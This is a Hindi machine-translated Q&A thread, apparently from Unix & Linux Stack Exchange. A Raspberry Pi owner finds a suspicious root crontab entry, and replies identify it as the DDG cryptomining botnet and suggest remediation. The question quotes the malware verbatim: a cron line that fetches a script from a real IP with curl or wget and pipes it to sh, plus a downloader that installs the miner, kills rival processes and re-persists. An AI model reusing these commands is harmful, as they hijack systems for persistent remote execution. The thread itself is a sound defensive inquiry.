हर 15 मिनट में 'xribfa4 ’पर चलने वाला संदेहास्पद कॉन्टैब प्रवेश


59

मैं अपने रास्पबेरी पाई पर अपनी रूट क्रॉस्टैब फ़ाइल में कुछ जोड़ना चाहता था, और एक प्रविष्टि मिली जो मुझे संदेहास्पद लगती है, Google पर इसके कुछ हिस्सों को खोजना कुछ भी नहीं हुआ।

Crontab प्रविष्टि:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

की सामग्री http://103.219.112.66:8000/i.shहैं:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

मेरा लिनक्स ज्ञान सीमित है, लेकिन मुझे ऐसा लगता है कि एक इंडोनेशियाई सर्वर से बायनेरी डाउनलोड करना और उन्हें नियमित रूप से रूट करना कुछ ऐसा नहीं है जो सामान्य है।

यह क्या है? मुझे क्या करना चाहिए?


16
यह गोलाकार है। हर 15 मिनट में यह स्वयं की एक नई प्रति डाउनलोड और इंस्टॉल करता है। यदि / जब दूरस्थ सर्वर पर प्रतिलिपि बदली जाती है, तो इस क्रोनजॉब को चलाने वाले सभी सर्वर 15 मिनट के भीतर, जो भी नया कोड है, निष्पादित करेंगे।
वाइल्डकार्ड

5
क्या आपकी रास्पबेरी पाई इंटरनेट पर खुली है? आपकी रास्पबेरी पाई क्या चल रही है? यह Google पर एकमात्र परिणाम है जब मैं xribfa4 खोजता हूं। यदि आप ऐसा सॉफ़्टवेयर नहीं चला रहे हैं जो ऐसा करने की आवश्यकता है तो यह एक वायरस है।
केमोटेप

6
@kemotep यह स्ट्रिंग रैंडम है, लेकिन IP के लिए google है और यह कुछ परिणाम देता है। एक ddg माइनिंग बॉटनेट के बारे में कुछ
frostschutz

9
मुझे यह मिला। इसका दीवाना यह है कि आईपी इंडोनेशियाई सरकार की साइट पर पंजीकृत है। यह भी लगता है कि इस पेलोड को वितरित करने वाले लगभग 2000 अन्य ips हैं।
केमोटेप

21
मुख्य बात यह है कि आप जानते हैं कि भले ही आप उस crontab प्रविष्टि को हटा दें, आपके सिस्टम में सबसे अधिक संभावना अभी भी भेद्यता है जो इसे संक्रमित होने की अनुमति देती है। आपको उस भेद्यता को खोजने और ठीक करने की आवश्यकता है।
हंस-मार्टिन मोजर

जवाबों:


79

यह DDG माइनिंग बॉटनेट है, यह कैसे काम करता है:

  1. एक आरसीई भेद्यता का शोषण
  2. Crontab को संशोधित करना
  3. उपयुक्त खनन कार्यक्रम डाउनलोड करना (साथ जाना लिखा)
  4. खनन प्रक्रिया शुरू करना

DDG: डेटाबेस सर्वर पर एक खनन बोटनेट लक्ष्य

SystemdMiner जब एक botnet दूसरे botnet के बुनियादी ढांचे को उधार लेता है

U & L: मैं AWS EC2 उदाहरण पर minerd मैलवेयर कैसे मार सकता हूं? (समझौता सर्वर)


4
हाँ, यह वास्तव में ऐसा लगता है कि यह है। धन्यवाद! इसे एक उत्तर के रूप में चिह्नित करेंगे, अगर कुछ भी नया नहीं आता है।
पीटर डैम

8
जड़ वाली मशीन के लिए सामान्य सलाह को मत भूलना: कोशिश करें और पता करें कि उन्हें कैसे मिला ताकि आप छेद को ठीक कर सकें। इससे सीखें, और अपनी सुरक्षा बढ़ाएँ। अंत में, nuke और मशीन को फिर से स्थापित करें।
मार्सेल

3
अच्छी खबर यह है कि वे केवल i686 और x86_64 के लिए पाई के लिए एक खान में काम करने वाले नहीं दिखते हैं।
मार्क

13
@Mark यह अच्छी खबर कैसे है? किसी ने अज्ञात प्रवेश बिंदु का उपयोग करके अपने पाई पर पूर्ण नियंत्रण प्राप्त कर लिया, और पाई पर किसी भी रहस्य तक पूर्ण पहुंच प्राप्त की (जिसमें पासवर्ड तक सीमित नहीं है)। माइनर रन वास्तव में "छोटी असुविधा" के दायरे में है या नहीं।
मार्सेल

4
@marcelm, हमलावर ने इस पर पूर्ण नियंत्रण प्राप्त किया, और फिर लगभग निश्चित रूप से उस नियंत्रण के साथ कुछ भी महत्वपूर्ण नहीं किया।
मार्क

2

यह पता लगाएं कि टीसीपी और यूडीपी पोर्ट वास्तव में किसकी जरूरत है, और फिर अपने राउटर के फ़ायरवॉल में अन्य सभी पोर्ट को ब्लॉक करें। संभवतः , उन crontab प्रविष्टियों को फिर से प्रकट नहीं किया जाएगा।

आप देख सकते हैं कि Shields Up का उपयोग करके कौन से पोर्ट खुले और सार्वजनिक हैं ! grc.com पर सुविधा


5
या वह भेद्यता पैच कर सकता है।
हार्पर - मोनिका

1
@ हार्पर बिल्कुल! वह दे दिया गया। मैं सोच रहा था कि शायद पहले अप्रयुक्त बंदरगाहों को अवरुद्ध किए बिना, इसे पैच करने की कोशिश करते समय इसे फिर से लगाया जा सकता है।
माइक वाटर्स

1
Security.SE से प्रासंगिक टिप्पणी: security.stackexchange.com/questions/147770/...
वाइल्डकार्ड

1
यह (केवल टीसीपी और यूडीपी के लिए सीमित नहीं है, हालांकि), हमेशा। Aka पॉजिटिव सुरक्षा मॉडल, श्वेतसूची या इनकार-डिफ़ॉल्ट - उन सभी ट्रैफ़िक से इनकार करें जिनका आप स्पष्ट रूप से उपयोग या आवश्यकता नहीं करते हैं - यह सुनिश्चित करने का एकमात्र तरीका है कि आपका कोई भी छेद प्रवेश करने के लिए उजागर नहीं हो।
एंटीक्रिस
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.